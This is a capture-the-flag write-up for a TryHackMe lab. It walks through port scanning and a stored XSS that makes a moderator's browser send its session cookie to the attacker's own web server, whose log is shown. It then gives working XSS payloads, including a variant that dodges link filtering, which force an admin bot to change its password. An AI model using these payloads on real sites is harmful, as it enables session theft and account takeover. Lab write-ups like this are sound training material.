🤨Whats Your Name?
License
The following post by anthonyjsaab is licensed under CC BY 4.0
0 - Introduction
Link to room: https://tryhackme.com/r/room/whatsyourname
Machine version: whatsyournamev1.87
This writeup walks you through a room on TryHackMe created by tryhackme, 1337rce, l000g1c
1 - Port Scan
1a - Discovery
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sS -T4 -p- 10.10.58.228
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-01 08:42 EEST
Nmap scan report for 10.10.58.228
Host is up (0.11s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8081/tcp open blackice-icecap
Nmap done: 1 IP address (1 host up) scanned in 388.39 seconds1b - Versioning and OS fingerprinting
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC -sV -O -p22,80,8081 10.10.58.228
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-01 08:51 EEST
Nmap scan report for 10.10.58.228
Host is up (0.10s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 4f:57:0f:de:f3:a7:d2:11:ef:ba:c7:82:0f:f6:4c:58 (RSA)
| 256 f6:d1:12:7c:86:e0:34:6f:35:f8:d6:f8:3e:ce:fc:97 (ECDSA)
|_ 256 f3:62:02:4b:3a:e4:5f:d8:12:fd:22:db:76:45:56:f0 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
8081/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 3.10 (93%), Adtran 424RG FTTH gateway (92%), Linux 5.4 (92%), Asus RT-N10 router or AXIS 211A Network Camera (Linux 2.6) (91%), Linux 2.6.18 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.26 seconds 2 - Web server probing
┌──(kali㉿kali)-[~]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.10.58.228 worldwap.thm
3 - XSS
3a - Payload injection
3b - Cookie and location of mod
After a minute or so, the moderator detonates the payload by browsing our registration submission and their browser sends us the following:
┌──(kali㉿kali)-[~]
└─$ python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.58.228 - - [01/May/2024 11:20:04] "GET /?mod_location=http://worldwap.thm/public/html/mod.php HTTP/1.1" 200 -
10.10.58.228 - - [01/May/2024 11:20:05] "GET /?mod_cookie=PHPSESSID=je78rbcm59vddlf9g5b4t3gsa0 HTTP/1.1" 200 -
3c - Mod flag
4 - Probing WORLDWAP
Most features on the website are static and do nothing. The only features that are dynamic are the chat and the change password pages.
4a - Change Password form
4b - Chat
This page is interesting. We can only talk with a bot named admin. We can reset the bot and clear the chat.
5 - A closer look at the chat
6 - Finding the correct payload
Through the discovered XSS vuln, we can make the bot send a forged request to change it password.
First, we copy what the request should look like by trying the change password page again:
await fetch("http://login.worldwap.thm/change_password.php", {
"credentials": "include",
"headers": {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.5",
"Content-Type": "application/x-www-form-urlencoded",
"Upgrade-Insecure-Requests": "1"
},
"referrer": "http://login.worldwap.thm/change_password.php",
"body": "new_password=hello",
"method": "POST",
"mode": "cors"
});A better and simple payload would be:
<script>
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://login.worldwap.thm/change_password.php");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.send('new_password=hello');
</script> We will clear the chat and try:
It did not work. If it doesn't work on our own browser, it will not work in the admin's browser. What is the problem? It turns out the payload is being modified before being stored, breaking everything:
We just need to bypass link detection and we are good to go!
<script>
var xhr = new XMLHttpRequest();
xhr.open("POST", "htt" + "p://login.worldwap.thm/change_password.php");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.send('new_password=hello');
</script> We clear the chat and try again:
7 - Getting the flag
We reset the bot to trigger chat browsing. This should have changed the password of the admin's account. We try to login:
Last updated
Was this helpful?